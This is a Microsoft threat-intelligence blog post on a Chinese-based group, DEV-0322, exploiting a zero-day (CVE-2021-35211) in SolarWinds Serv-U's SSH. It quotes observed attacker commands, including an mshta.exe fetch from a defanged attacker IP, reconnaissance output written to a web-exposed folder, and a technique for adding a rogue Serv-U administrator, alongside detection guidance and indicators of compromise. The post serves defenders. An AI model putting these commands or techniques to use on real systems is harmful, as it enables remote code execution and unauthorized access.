Skip to main content Why Microsoft Security AI-powered cybersecurity Cloud security Data security & governance Identity & network access Privacy & risk management Security for AI Unified SecOps Zero Trust Microsoft Defender Microsoft Entra Microsoft Intune Microsoft Priva Microsoft Purview Microsoft Sentinel Microsoft Security Copilot Microsoft Entra ID (Azure Active Directory) Microsoft Entra Agent ID Microsoft Entra External ID Microsoft Entra ID Governance Microsoft Entra ID Protection Microsoft Entra Internet Access Microsoft Entra Private Access Microsoft Entra Permissions Management Microsoft Entra Verified ID Microsoft Entra Workload ID Microsoft Entra Domain Services Azure Key Vault Microsoft Sentinel Microsoft Defender for Cloud Microsoft Defender XDR Microsoft Defender for Endpoint Microsoft Defender for Office 365 Microsoft Defender for Identity Microsoft Defender for Cloud Apps Microsoft Security Exposure Management Microsoft Defender Vulnerability Management Microsoft Defender Threat Intelligence Microsoft Defender Suite for Business Premium Microsoft Defender for Cloud Microsoft Defender Cloud Security Posture Mgmt Microsoft Defender External Attack Surface Management Azure Firewall Azure Web App Firewall Azure DDoS Protection GitHub Advanced Security Microsoft Defender for Endpoint Microsoft Defender XDR Microsoft Defender for Business Microsoft Intune core capabilities Microsoft Defender for IoT Microsoft Defender Vulnerability Management Microsoft Intune Advanced Analytics Microsoft Intune Endpoint Privilege Management Microsoft Intune Enterprise Application Management Microsoft Intune Remote Help Microsoft Cloud PKI Microsoft Purview Communication Compliance Microsoft Purview Compliance Manager Microsoft Purview Data Lifecycle Management Microsoft Purview eDiscovery Microsoft Purview Audit Microsoft Priva Risk Management Microsoft Priva Subject Rights Requests Microsoft Purview Data Governance Microsoft Purview Suite for Business Premium Microsoft Purview data security capabilities Pricing Services Partners Cybersecurity awareness Customer stories Security 101 Product trials How we protect Microsoft Industry recognition Microsoft Security Insider Microsoft Digital Defense Report Security Response Center Microsoft Security Blog Microsoft Security Events Microsoft Tech Community Documentation Technical Content Library Training & certifications Compliance Program for Microsoft Cloud Microsoft Trust Center Security Engineering Portal Service Trust Portal Microsoft Secure Future Initiative Business Solutions Hub Contact Sales Start free trial Microsoft Security Azure Dynamics 365 Microsoft 365 Microsoft Teams Windows 365 Microsoft AI Azure Space Mixed reality Microsoft HoloLens Microsoft Viva Quantum computing Sustainability Education Automotive Financial services Government Healthcare Manufacturing Retail Find a partner Become a partner Partner Network Microsoft Marketplace Marketplace Rewards Software development companies Blog Microsoft Advertising Developer Center Documentation Events Licensing Microsoft Learn Microsoft Research View Sitemap

Content types

Products and services

Topics

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

The vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell (SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.

Microsoft 365 Defender has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker’s follow-on malicious actions. Microsoft Threat Experts customers who were affected were notified of attacker activity and were aided in responding to the attack.

Microsoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.

Who is DEV-0322?

MSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a “development group” or “DEV group” and assigns each DEV group a unique number (DEV-####) for tracking purposes.

MSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.

Attack details

MSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from Serv-U.exe include:

  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.

Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.

By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.

To protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a targeted attack notification, which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.

Detection guidance

Customers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A C0000005; CSUSSHSocket::ProcessReceive exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Additional signs of potential compromise include:

  • Recent creation of .txt files in the Client\Common\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.
  • Serv-U.exe spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for:
    • mshta.exe
    • powershell.exe
    • cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:
      • whoami
      • dir
      • ./Client/Common
      • .\Client\Common
      • type [a file path] > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive”
    • Any process with any of the following in the command line:
      • C:\Windows\Temp\
  • The addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users, which appears to store the Global users information.
Image

Detection details

Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

  • Behavior:Win32/ServuSpawnSuspProcess.A
  • Behavior:Win32/ServuSpawnCmdClientCommon.A

Endpoint detection and response (EDR) alerts

Alerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:

  • Suspicious behavior by Serv-U.exe

Azure Sentinel query

To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp

Microsoft Threat Intelligence

See Microsoft Threat Intelligence posts

Related posts

Get started with Microsoft Security

Protect your people, data, and infrastructure with AI-powered, end-to-end security from Microsoft.

Learn how

Connect with us on social

Surface Pro Surface Laptop Surface Laptop Studio 2 Copilot for organizations Copilot for personal use AI in Windows Explore Microsoft products Windows 11 apps Account profile Download Center Microsoft Store support Returns Order tracking Certified Refurbished Microsoft Store Promise Flexible Payments Microsoft in education Devices for education Microsoft Teams for Education Microsoft 365 Education How to buy for your school Educator training and development Deals for students and parents AI for education
Microsoft AI Microsoft Security Dynamics 365 Microsoft 365 Microsoft Power Platform Microsoft Teams Microsoft 365 Copilot Small Business Azure Microsoft Developer Microsoft Learn Support for AI marketplace apps Microsoft Tech Community Microsoft Marketplace Marketplace Rewards Visual Studio Careers About Microsoft Company news Privacy at Microsoft Investors Diversity and inclusion Accessibility Sustainability
English (United States)
Your Privacy Choices Opt-Out Icon Your Privacy Choices
Consumer Health Privacy Sitemap Contact Microsoft Privacy Manage cookies Terms of use Trademarks Safety & eco Recycling About our ads